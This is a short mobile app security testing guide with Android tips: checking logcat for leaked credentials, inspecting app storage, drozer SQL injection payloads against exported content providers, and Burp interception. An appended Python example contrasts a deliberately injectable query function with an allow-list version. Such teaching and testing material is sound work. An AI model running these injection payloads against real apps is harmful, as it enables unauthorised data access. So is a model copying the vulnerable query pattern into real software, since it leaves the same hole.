Some Tips to check on Android Apps
1. Whenever you are registering or signing in to an app, run adb logcat and check whether the registration or login details show up in the logs.
On Windows use:
adb shell ps | findstr -i <package name>
adb logcat | findstr <ps id>
Example: https://bugbountypoc.com/mediafire-andriod-app-leaking-sensitive-user-data/
2. Check internal storage. If the phone is rooted, you can simply browse /data/data/application; if it is a non-rooted phone, you can follow the link below.
3. Check for exported content providers. Using drozer, you can find SQL injection in content providers.
Usage:
dz> run scanner.provider.injection -a <package name>
Suppose the content provider com.google.settings has exported set to true:
dz> run app.provider.query content://com.google.settings/partner/
dz> run app.provider.query content://com.google.settings/partner/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
dz> run app.provider.query content://com.google.settings/partner/ --selection "1=1"
dz> run app.provider.query content://com.google.settings/partner/ --projection "* FROM partner;--"
4. Intercept the application's traffic in Burp Suite and test it the way you would a normal web app.
5. Decompile the APK and check for APIs that use WebViews; if you are lucky enough, you will get XSS in the mobile application.
Note: I am not so pro in reverse engineering, so the above tips are the test cases I used, and using them I found bugs in apps.
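
Why the --projection payload in tip 3 works, and what stops it, as an added example that is not from the original post: a Python sqlite3 model of a provider's query() path. The partner and secrets tables, the function names and ALLOWED_COLUMNS are constructed assumptions; only the payload string comes from the drozer command above.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the provider's backing database.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE partner (_id INTEGER PRIMARY KEY, name TEXT, value TEXT);
        CREATE TABLE secrets (_id INTEGER PRIMARY KEY, token TEXT);
        INSERT INTO partner (name, value) VALUES ('client_id', 'demo');
        INSERT INTO secrets (token) VALUES ('constructed-token');
    """)
    return db

def vulnerable_query(db, projection="*", selection="1=1"):
    # Caller-controlled strings are pasted straight into the statement, so the
    # projection can end the column list and supply its own FROM clause.
    sql = f"SELECT {projection} FROM partner WHERE {selection}"
    return db.execute(sql).fetchall()

ALLOWED_COLUMNS = {"_id", "name", "value"}  # hypothetical projection allow-list

def hardened_query(db, projection=None, column=None, arg=None):
    # Every requested column must match the allow-list exactly; the filter
    # value is bound as a parameter and never concatenated into the SQL.
    cols = list(projection or sorted(ALLOWED_COLUMNS))
    bad = [c for c in cols if c not in ALLOWED_COLUMNS]
    if bad or (column is not None and column not in ALLOWED_COLUMNS):
        raise ValueError(f"rejected column(s): {bad or [column]}")
    where, params = "", ()
    if column is not None:
        where, params = f" WHERE {column} = ?", (arg,)
    sql = f"SELECT {', '.join(cols)} FROM partner{where}"
    return db.execute(sql, params).fetchall()

# Projection string taken from the drozer command in tip 3.
PAYLOAD = "* FROM SQLITE_MASTER WHERE type='table';--"

def demo():
    db = make_db()
    leaked = vulnerable_query(db, projection=PAYLOAD)
    table_names = sorted(row[1] for row in leaked)  # sqlite_master.name column
    try:
        hardened_query(db, projection=[PAYLOAD])
        blocked = False
    except ValueError:
        blocked = True
    return table_names, blocked

if __name__ == "__main__":
    print(demo())
```

On Android the equivalent controls are a strict projection map on the query builder and selectionArgs for values, plus not exporting the provider unless other apps need it.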